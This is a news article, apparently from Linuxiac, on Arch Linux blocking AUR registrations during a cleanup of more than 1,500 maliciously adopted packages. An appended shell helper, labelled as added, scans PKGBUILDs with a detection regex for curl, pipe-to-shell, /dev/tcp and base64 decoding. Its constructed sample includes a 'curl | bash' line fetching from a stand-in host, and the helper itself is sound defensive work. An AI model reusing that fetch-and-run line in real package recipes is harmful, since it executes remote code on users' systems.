Arch Linux Blocks New AUR Registrations Amid Malware Cleanup

Arch Linux’s AUR is still operational, while new account registration appears blocked during ongoing cleanup work.

Arch Linux is dealing with one of the largest security incidents to hit the Arch User Repository in recent memory, as maintainers continue cleaning up a wave of malicious package updates across the community-maintained platform.

Importantly, the AUR remains online, and packages are accessible. However, new account registration is unavailable, with the registration page returning a 503 Service Unavailable error. While not officially announced, this suggests Arch has temporarily blocked an entry point as it works through the cleanup.

The move follows an official Arch Linux warning notice dated June 12 about a “high volume” of malicious package adoptions and updates in the AUR. Maintainers are tracking down malicious commits and trying to prevent more from being pushed while preparing a permanent solution.

Arch also warned users may experience problems with new account creation, package updates, adoptions, and new package creation during the response.

Unfortunately, the incident appears far larger than early reports suggested. Initial public reports pointed to over 400 affected AUR packages, while later community tracking raised the number to more than 1,500. The final count may still change as maintainers continue auditing and removing malicious changes.

The scale of the AUR helps explain why the incident is difficult to contain quickly. According to the repository’s own statistics, the AUR currently lists 107,405 packages, including 13,051 orphan packages. It also shows 273 packages added in the past seven days and 5,575 packages updated over the same period, alongside 141,968 registered users.

The campaign reportedly abused the AUR’s package adoption system, where orphaned packages can be taken over by new maintainers. Malicious updates were pushed to affected packages, sometimes pulling external payloads during build or installation.

For users, the immediate advice remains: review PKGBUILD files and install scripts before installing or updating AUR packages, especially if a package recently changed maintainer or received an unexpected update. Users who installed recently updated packages should check the package history and inspect commands executed during build or install.
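Added example, not part of the article and not an Arch tool: a POSIX shell helper that performs the review step above mechanically, scanning a package directory's PKGBUILD and .install hooks for the patterns worth inspecting by hand (network fetches in build steps, pipe-to-shell, base64 decoding, eval, raw sockets, disabled checksums) and, in an AUR git clone, listing who recently touched the recipe. The sample package it audits is constructed, and the patterns are heuristics that surface lines for review rather than a complete detector.

```sh
#!/bin/sh
# Hypothetical helper for reviewing an AUR package directory before makepkg.
# Each regex alternative is a heuristic: a hit means "read this line", not "malware".
SUSPECT_RE='(curl|wget)[[:space:]]|\|[[:space:]]*(ba|z)?sh([[:space:]]|$)|base64[[:space:]]+(-d|--decode)|(^|[[:space:];])eval[[:space:]]|/dev/tcp/|(md5|sha[0-9]*|b2)sums=.*SKIP'

# audit_file FILE: print "FILE:LINE:text" for each suspect line that is not a comment.
audit_file() {
    grep -nE "$SUSPECT_RE" "$1" \
        | grep -vE '^[0-9]+:[[:space:]]*#' \
        | awk -v f="$1" '{ print f ":" $0 }'
}

# audit_dir DIR: audit the PKGBUILD and every .install hook in a package directory.
audit_dir() {
    for f in "$1"/PKGBUILD "$1"/*.install; do
        [ -f "$f" ] && audit_file "$f"
    done
    return 0
}

# audit_count DIR: number of findings as a bare integer (tr strips BSD wc padding).
audit_count() {
    audit_dir "$1" | wc -l | tr -d ' '
}

# recent_authors DIR: in an AUR git clone, show who last changed the recipe.
# A new author appearing after a long gap is the adoption signal the article describes.
recent_authors() {
    git -C "$1" log -n 10 --format='%h %ad %an' --date=short -- PKGBUILD .SRCINFO
}

# Constructed sample package (not a real AUR package) used to demonstrate the audit.
SAMPLE_DIR=$(mktemp -d)
cat > "$SAMPLE_DIR/PKGBUILD" <<'EOF'
pkgname=example-tool
pkgver=1.2.3
pkgrel=2
source=("https://example.org/releases/$pkgname-$pkgver.tar.gz")
sha256sums=('SKIP')
# curl is used below to fetch a helper
build() {
  cd "$pkgname-$pkgver"
  curl -fsSL https://example.invalid/setup.sh | bash
  make
}
EOF
cat > "$SAMPLE_DIR/example-tool.install" <<'EOF'
post_install() {
  echo aGVsbG8= | base64 -d > /usr/local/bin/helper
}
EOF
audit_dir "$SAMPLE_DIR"
```

The comment line mentioning curl is deliberately skipped; the SKIP checksum, the pipe-to-bash in build(), and the base64 decode in post_install() are the three lines reported.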

As expected, this incident is likely to renew discussion around AUR safeguards. Possible areas include tougher rules for adopting orphan packages, delays before new accounts can submit or adopt packages, and stronger review of sudden ownership changes.

For now, Arch Linux is keeping the AUR operational while blocking or limiting actions that could let the campaign continue. The unavailability of new registrations is the clearest sign that the project is taking containment measures while maintainers clean up malicious packages.

Bobby Borisov

Bobby, an editor-in-chief at Linuxiac, is a Linux professional with over 20 years of experience. With a strong focus on Linux and open-source software, he has worked as a Senior Linux System Administrator, Software Developer, and DevOps Engineer for small and large multinational companies.
